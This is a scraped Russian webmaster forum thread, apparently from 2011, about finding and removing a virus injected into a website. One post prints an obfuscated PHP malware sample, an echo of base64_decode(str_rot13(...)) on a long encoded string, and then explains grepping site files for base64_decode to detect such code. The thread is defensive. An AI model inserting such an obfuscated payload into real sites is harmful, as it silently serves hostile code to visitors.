nik2019

nik2019
Рейтинг
182
Регистрация
28.04.2009
ArtemZ:
для начала нужно попрактиковаться в написании грамотных предложений на русском языке.

с этим у меня всегда косяки были, по-этому и прошу помощи. Не умею продавать)

Mad_Man:
Не за что :)

Но Вы не совсем точно объяснили где был вирус, ббкод не при чём :)

==================================

Вы на почте спрашивали как находить в будущем вирусы, напишу лучше сюда, может кому-нибудь помогу.

Ищется довольно легко, вариантов не много.
Первый - это прямая вставка в код в открытом виде. Но ведь я тогда был бы не нужен, верно? :)
Второй вариант - использование обфускаторов, то есть вместо "hello" мы получаем набор букв и символов вида "aGVsbG8=". Основной поддержкой такой обфускации является вызов base64. Вредоносный код, к примеру, может быть записан в таком виде:

$somecrainsignvar="ny2fmed8"; echo base64_decode(str_rot13('VQkmL3WcpUD+VN0XqzSlVTquFaAVo3A0VQ0tXPtvnUE0pQbvVQ09VTEiL3IgMJ50YzkiL2S0nJ9hYaOlo3EiL29fXFN/VPWbqUEjBv8irJShMT

I4VvN6VPWbqUEjBv8irJShMTI4Vvx7VTEiL3IgMJ50YaqlnKEyXUIhMKAwLKOyXPVyZ0AmL3WcpUDtp3WwCFpvVPftM2SXp0uip3DtXlNvYKyuozEyrP51ozxhL2ZiqzIlnJM5YKLkC2yxCFVeGJS0nP5zoT9ipvuALKEbYaWuozEioFtcVP
bmZQNjZPxeVvMapz91pQ0lWaAyo3WyMw0vX2IhL29xMIIFFHAioKOiozIhqPuxo2A1oJIhqP5lMJMypaWypvxeVPVzpTSlLJ1yqTIlCFEeMKy3o3WxWaAyCFEmMFM1pw0kWxuHISOsHxITEIWSHw0vX2IhL29xMIIFFHAioKOiozIhqPuxo2
A1oJIhqP5IHxjcXlVzMTIzLKIfqS9eMKy3o3WxCFptqUyjMG0aqTI4qP9dLKMup2AlnKO0WlHmEFHmDl9mL3WcpUDyZ0HvXFx7QDbtCP9mL3WcpUD+VN==')); $crain="";

... но у всех таких обфускаций есть одно общее - упоминание "base64_decode", что используется на здоровых сайтах довольно редко, да и то в шаблонах, поэтому условно считаем любой найденных фрагмент "base64_decode" вредоносным кодом.

Теперь как искать:
1) Нужен дамп всех файлов сайта.
2) Нужно устройство для поиска, но так как я использую для работы OS Ubuntu, то у меня по умолчанию есть шустрая команда 'grep', которая позволяет искать текст в указанной папке. Запрос на поиск довольно прост: "grep <параметры> <текст для поиска> <путь для поиска>. К примеру наш запрос может иметь следующий вид: "grep -rl base64_decode /home/www/site.ru", где <grep> - вызов команды, <-rl> - указание на включение в поиск всех вложенных папок в основную для поиска (r = рекурсивно = все папки, что будут в папке для поиска), <base64_decode> - фраза для поиска, </home/www/site.ru> - путь для поиска.

И да, grep по умолчанию доступен в большинстве дистрибутивов Linux и *BSD, поэтому если у Вас есть доступ к ssh на сервере, то искать вирусную вставку можно прямо с сервера, не выкачивая файлы сайта.

Спасибо! Теперь буду знать, как искать один из видов вируса. Первый раз с этим столкнулся.

Mad_Man, спасибо вам за помощь. Смог он найти и удалить вирус с сайта. В ббкоде он был.

Quter:
это что за хрень с yandex.uni.cc?

да я его тоже видел, и коллега видел. Но он не смог, как его удалить. Сейчас поищим, как это сделать.

Я вначале подумал, что это системный какой-то. Спасибо! Сейчас попробуем удалить.

nik2019 добавил 16.06.2011 в 18:01

DyaDya:
Такой отмазки сказать адрес сайта я ещё не слышал. )))) Как это у вас цена связана с адресом сайта?

надеюсь, у вас найдётся всего парочка тыщ рубликов за поиск и лечение этого чуда от виря? Если да, то обращайтесь.

за свои сайты, я всегда готов платить и плачу. Но тут не мой, и бюджет у меня на него нету, я им не занимаюсь.

nik2019 добавил 16.06.2011 в 18:07

Quter:
это что за хрень с yandex.uni.cc?

а помоги пожалуйста, эту бадягу найти?

nik2019 добавил 16.06.2011 в 18:24

DyaDya:
Такой отмазки сказать адрес сайта я ещё не слышал. )))) Как это у вас цена связана с адресом сайта?

надеюсь, у вас найдётся всего парочка тыщ рубликов за поиск и лечение этого чуда от виря? Если да, то обращайтесь.

написал в личку. Позвонил. кто руководит этим проектом, деньги есть.

Mad_Man:
Ну раз сожалеете, что сайт стоит миллион, тогда ладно.

выслал в личку

nik2019 добавил 16.06.2011 в 17:55

Пока отбой, коллега, сказал, что нашел какой-то скрипт в header(e), "странный", из-за которого глючело меню, он его удалил - сайт стал нормально работать.

Нужно подождать новой проверки на вирусы теперь.

Mad_Man:
Quter, выпала честь посмотреть на сверхсекретный сайт. Мне аж завидно. Как ощущения?

сайт стоит миллион, к сожалению, не могу сюда его выложить. ( Рабочий сайт, лично им не занимаюсь, коллега занимается, но он не может найти вирус)

Quter:
телепат мод ... ждите... включен.
какого именно сайта?

скинул в личку

нужна ваша помощь, написал в личку, свяжитесь пожалуйста

Если ли нормальный плагин по сохранению кэша в joomla?

и как увеличить скорость загрузки сайта? Пробовал тысячи методов, но может быть чего-то не доглядел.

Kost:
Здесь 670 страниц. Посмотрите на их адреса. Посмотрите на оптимизацию. Все отлично?

Не отлично)

Всего: 1788